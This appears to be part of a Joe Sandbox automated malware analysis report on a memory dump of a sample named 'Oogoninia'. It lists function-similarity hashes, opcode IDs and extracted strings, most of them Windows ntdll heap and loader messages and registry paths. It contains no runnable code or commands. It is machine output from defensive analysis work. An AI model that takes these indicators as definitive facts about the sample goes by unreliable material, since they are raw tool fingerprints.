                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$eU2
                                                                                                                                                                                    • API String ID: 0-3991691321
                                                                                                                                                                                    • Opcode ID: bd1e1b85eee06d92515a270b9dd8a52e8238508c3541db49b152d446638b0ecd
                                                                                                                                                                                    • Instruction ID: 1af1d849450ab8cf971274df24a7790827b51598aa026476f978c5c7d86ea0bf
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd1e1b85eee06d92515a270b9dd8a52e8238508c3541db49b152d446638b0ecd
                                                                                                                                                                                    • Instruction Fuzzy Hash: EA316D72900219BBDB128B95CD44EFEBBB9EB84758F505425E504E7260DB74DB05CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: e891df524a1bbec93bee0764d7186ae755637cf94568c703a0813bb5081023df
                                                                                                                                                                                    • Instruction ID: 2f9d4c4c4c86f61694f371a82be8e7e1304031282669dd805b736e33c4492d23
                                                                                                                                                                                    • Opcode Fuzzy Hash: e891df524a1bbec93bee0764d7186ae755637cf94568c703a0813bb5081023df
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51FE74A00715EFEB09CB64C884BAEBBB0BF44755F10816AE912972D0DFB4AB45CF80
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HEAP: , xrefs: 3257F6BE
                                                                                                                                                                                    • HEAP[%wZ]: , xrefs: 3257F6B1
                                                                                                                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 3257F6D3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                    • API String ID: 0-3178619729
                                                                                                                                                                                    • Opcode ID: 5a2a962a571e07f7d85f80caf02d9a628891564ddc195a0c72ab9de6235fab8a
                                                                                                                                                                                    • Instruction ID: a990d84446bce1aab722f52fba9f92281304b74c5254401d05349bd786cec8b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a2a962a571e07f7d85f80caf02d9a628891564ddc195a0c72ab9de6235fab8a
                                                                                                                                                                                    • Instruction Fuzzy Hash: CB12C074A00351EFE718CF28C480B66BBA1BF45714F64C59DE895DB6C6DB70EA41CBA0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                                                                                                                    • API String ID: 0-1168191160
                                                                                                                                                                                    • Opcode ID: 6797d732da5cea45a31062fde182992421045414a3ad57ebdfdf3453941eea93
                                                                                                                                                                                    • Instruction ID: 858ec9882220438a288aea7d30a8293e77c6fc39f25551fe51b888cb03792484
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6797d732da5cea45a31062fde182992421045414a3ad57ebdfdf3453941eea93
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AF190B5A01228ABDF21CF14CC80BD9B7B5AF98754F5440E9EA09B7240EBB09F85CF55
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 325900C7
                                                                                                                                                                                    • RTL: Re-Waiting, xrefs: 32590128
                                                                                                                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 325900F1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                    • API String ID: 0-2474120054
                                                                                                                                                                                    • Opcode ID: 4ba00e1b3547b2c47a978ad99e9a80608bf8b4808add761237ecfa9ea1f44ddb
                                                                                                                                                                                    • Instruction ID: 17ca1dd8ac9456e77aa9665949353dece2b931599d616ea7873b41019a9687e8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ba00e1b3547b2c47a978ad99e9a80608bf8b4808add761237ecfa9ea1f44ddb
                                                                                                                                                                                    • Instruction Fuzzy Hash: CFE19F756087419FE715CF28C880B6ABBE1BF84368F500A59F5A5CB2E1DB74EA44CB42
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                    • API String ID: 0-2391371766
                                                                                                                                                                                    • Opcode ID: ad2533dcfaf0b81b6f3746462f1e88be916dd952cdf1af500453be386f334ad8
                                                                                                                                                                                    • Instruction ID: 11d4c8950f53ffbd6e5ae0fab82243e00d4018824a4718a4c49204ab1ecc55ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: ad2533dcfaf0b81b6f3746462f1e88be916dd952cdf1af500453be386f334ad8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AB1C275605341BFE312CF54C991B5FB7E8AB98758F40482AFE40DB290DBB4EA44CB92
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                    • API String ID: 0-2779062949
                                                                                                                                                                                    • Opcode ID: 6560e3be8d03aca7f3ca1c0b9c26cfd7a3d528ad2ed63a43d95dd9f471b33ce5
                                                                                                                                                                                    • Instruction ID: d6183c7ae6107d3fedafba631f03c1e77a2db6a070044a9ac5fd7010f216cad7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6560e3be8d03aca7f3ca1c0b9c26cfd7a3d528ad2ed63a43d95dd9f471b33ce5
                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA17C759416299BEB21DF28CC88BEEB7B8EF44705F1005EAE908A7250DB759F84CF50
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • TargetNtPath, xrefs: 325FB3AF
                                                                                                                                                                                    • GlobalizationUserSettings, xrefs: 325FB3B4
                                                                                                                                                                                    • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 325FB3AA
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                    • API String ID: 0-505981995
                                                                                                                                                                                    • Opcode ID: 7164d1b62e2a3f666330116b920cb578e96545c550d48c8dfa1d9e41b0fbf864
                                                                                                                                                                                    • Instruction ID: 358992e120737cc1a481beea30386880da94fae1e8438ca9a1d4cca3df1de6b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7164d1b62e2a3f666330116b920cb578e96545c550d48c8dfa1d9e41b0fbf864
                                                                                                                                                                                    • Instruction Fuzzy Hash: B761A072941229FBDB21DF54DC88BDAB7B8AB48714F4101E5EA08A7290DB74DF84CF90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • HEAP: , xrefs: 3257E442
                                                                                                                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3257E455
                                                                                                                                                                                    • HEAP[%wZ]: , xrefs: 3257E435
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                    • API String ID: 0-1340214556
Strings
• minkernel\ntdll\ldrmap.c, xrefs: 3258A3A7
• Could not validate the crypto signature for DLL %wZ, xrefs: 3258A396
• LdrpCompleteMapModule, xrefs: 3258A39D
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
• API String ID: 0-1676968949
Strings
• HEAP: , xrefs: 325CD79F
• Heap block at %p modified at %p past requested size of %Ix, xrefs: 325CD7B2
• HEAP[%wZ]: , xrefs: 325CD792
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
• API String ID: 0-3815128232
Strings
• @SO2, xrefs: 3252A268
• RtlpResUltimateFallbackInfo Enter, xrefs: 3252A21B
• RtlpResUltimateFallbackInfo Exit, xrefs: 3252A229
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: @SO2$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-3694217038
Strings
• @, xrefs: 325AB2F0
• GlobalFlag, xrefs: 325AB30F
• \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 325AB2B2
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
• API String ID: 0-4192008846
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: .tR2
• API String ID: 0-1913366987
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID:
• String ID: @$@
• API String ID: 0-149943524
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID: DebugPrintTimes
• String ID:
• API String ID: 3446177414-0
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 325FB5C4
                                                                                                                                                                                    • RedirectedKey, xrefs: 325FB60E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                                                                                                                    • API String ID: 0-1388552009
                                                                                                                                                                                    • Opcode ID: 7f7e8314c74336c7a940278b2e7f1ba452b008e8c3ed9ebf6c896d4d54c8849a
                                                                                                                                                                                    • Instruction ID: 7ff2bab54167ef375cd08c7fb9bd014e3c49b1509ca9453c448864800e86c094
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f7e8314c74336c7a940278b2e7f1ba452b008e8c3ed9ebf6c896d4d54c8849a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A6102B5C42218FBDB11DF94C988ADEBBB8FB48704F50446AE905A7240DB759A85CFA0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$$
                                                                                                                                                                                    • API String ID: 3446177414-233714265
                                                                                                                                                                                    • Opcode ID: 8f863459c6745c73d7f52690cba969a9f5d2abef4f86edee5ea5e9655621b755
                                                                                                                                                                                    • Instruction ID: 22426276e1eb2373c426f96c9ea9cceb9ebbabc8941979eed38aa9879f3d20f2
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f863459c6745c73d7f52690cba969a9f5d2abef4f86edee5ea5e9655621b755
                                                                                                                                                                                    • Instruction Fuzzy Hash: D861F175A02749DFEB26CFA4C590B9DFBB1BF84304F505469D605AB790CBB4BA81CB80
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                                                                                                                    • API String ID: 0-118005554
                                                                                                                                                                                    • Opcode ID: 7cf1aba1f86feaae183e33f4d24218c72d509711e4e906a656690ec2c91bbd8b
                                                                                                                                                                                    • Instruction ID: cccb603e6774a752b972f7b4634a401c5cef6dafc05c237c5b45d7ccfe95b2f5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cf1aba1f86feaae183e33f4d24218c72d509711e4e906a656690ec2c91bbd8b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 91312275209780ABD702CF68D840B1ABBE8EFD5718F440869F850DB380EBB5DA04CB92
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: Q2$ Q2
                                                                                                                                                                                    • API String ID: 0-3867892922
                                                                                                                                                                                    • Opcode ID: 40ac72b498f949a1583585d5764d5a6014fdf4a50490bd1620ffc7bae831f6a9
                                                                                                                                                                                    • Instruction ID: 392fe461ff519e5e923fbc9d5e79ecd1e54cd888a1e28ccbe52fe572be12573a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 40ac72b498f949a1583585d5764d5a6014fdf4a50490bd1620ffc7bae831f6a9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A831C2376067019FD716DE24C890A9BBBA5AFE42A0F094929FC05972D0EE30DE05CBA1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: @$InX2
                                                                                                                                                                                    • API String ID: 0-2486916426
                                                                                                                                                                                    • Opcode ID: 534f6a135255c00c93300b53338e6217db378a793c0759159895969fe48fce74
                                                                                                                                                                                    • Instruction ID: 74cb29695f5dc0e48c7cbe8a8e3a72e2ca804e636dcf16d8b77f086e56b3d26f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 534f6a135255c00c93300b53338e6217db378a793c0759159895969fe48fce74
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A3190B5509741AFD311CF28C880A9BBBE8EB95754F50092EF99983250D634DE09CBD2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3259289F
                                                                                                                                                                                    • RtlpInitializeAssemblyStorageMap, xrefs: 3259289A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                                                                                                                    • API String ID: 0-2653619699
                                                                                                                                                                                    • Opcode ID: e2b23b41957964911d773b035587dba5481f80980bdb4f783fad699c0caccee0
                                                                                                                                                                                    • Instruction ID: 729841c42f38f7d85ff5ab0bc7c8794dd97f28dfeb3f9f9090ba0cf1f91d4ad3
                                                                                                                                                                                    • Opcode Fuzzy Hash: e2b23b41957964911d773b035587dba5481f80980bdb4f783fad699c0caccee0
                                                                                                                                                                                    • Instruction Fuzzy Hash: FF112976B00304FBF7198F48CD45F9B7BA8DBD8754F60846ABA04DB244DA74CF0186A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: InX2$InX2
                                                                                                                                                                                    • API String ID: 0-577825928
                                                                                                                                                                                    • Opcode ID: b128784d180ddd0970180236f70e236a11a75381591b27d9da7b0822b13d185e
                                                                                                                                                                                    • Instruction ID: 8056d44478f2932bf57c26a2e1b2cf886e60d899cd65516489b0a4e8a9a46c94
                                                                                                                                                                                    • Opcode Fuzzy Hash: b128784d180ddd0970180236f70e236a11a75381591b27d9da7b0822b13d185e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1911E172500208BFCB069F6CE8809BEBBB9EF99354F50846AF944CB250DA75CE55C7A4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                    • String ID: Cleanup Group$Threadpool!
                                                                                                                                                                                    • API String ID: 2994545307-4008356553
                                                                                                                                                                                    • Opcode ID: 670a20cf0ba1bafa521dc29aba7f47e5bdcc4fb8d80f1152ea0e5483d2526463
                                                                                                                                                                                    • Instruction ID: 669c5c353c79a2b602f92c763a2ae092e968fb743b0b46ad77469b9cc9c33dd9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 670a20cf0ba1bafa521dc29aba7f47e5bdcc4fb8d80f1152ea0e5483d2526463
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: f2de8e94d342921ae3714e2d3ca696665c644a5df53812f174b42e33f28b5224
                                                                                                                                                                                    • Instruction ID: e02492d197c755830fb4425c108991bcd6e65eb6adef8522dfe42f244d5dd6ab
                                                                                                                                                                                    • Opcode Fuzzy Hash: f2de8e94d342921ae3714e2d3ca696665c644a5df53812f174b42e33f28b5224
                                                                                                                                                                                    • Instruction Fuzzy Hash: F401853A101249BBDF028E84D851ECE3F66FB4C794F068501FE1866220C736EAB1EB80
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3446177414-0
                                                                                                                                                                                    • Opcode ID: cd551ea218eed2278304dca3a2b9df6bbdffc2c0de2966bc82c7e3d07ce9e5d1
                                                                                                                                                                                    • Instruction ID: c018682ea7381ae3d443fa9df5aa397dffa74ab8d635be11f441b4fe70c907da
                                                                                                                                                                                    • Opcode Fuzzy Hash: cd551ea218eed2278304dca3a2b9df6bbdffc2c0de2966bc82c7e3d07ce9e5d1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0F0321006007BEB319B09CC04F8BBBEDEFC4700F080519A54293490C7A0FA45C690
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
